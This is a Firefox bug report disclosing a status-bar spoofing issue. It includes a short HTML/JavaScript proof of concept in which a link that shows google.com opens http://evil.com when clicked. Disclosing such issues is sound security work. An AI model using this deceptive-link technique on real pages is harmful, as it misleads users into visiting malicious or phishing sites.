Closed Bug 1310406 Opened 8 years ago Closed 8 years ago

Status Bar Obfuscation

Categories

(Firefox :: Untriaged, defect)

Product:
Firefox
Component:
Untriaged
Version:
49 Branch
Platform:
All
Windows 7
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1310432

People

(Reporter: sweetshanuu, Unassigned)

Details

Attachments

(1 file)

firefox Status Bar Obfuscation.mp4
4.58 MB, video/mp4
Details 
STEPS TO REPRODUCE:-

1.Save the below script as html file (test.html i saved here)

<h1>
<a href="http://google.com" onclick="javascript:OB();">https://google.com</a>
</h1>
 
<script>
 
function OB() {
 
document.write('');
window.close();
window.open('http://evil.com');
 
}
 
</script>


2.Open the HTML file in Firefox browser 
3.You will see a hyperlink of google.com, So hover your mouse.
4.See the Status Bar(located at the lower left of the browser) and you will see the link where it should be redirected
5.Now, click the hyperlink and you will be redirected to another website which is not the expected website.

ACTUAL RESULT:-

On mouse over to hyperlink it shows the url is https://google.com,
On click that it  redirects to http://evil.com/

EXPECTED RESULT:-

The status bar url should show the correct url that is going to redirect.

Video POC is attached below
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: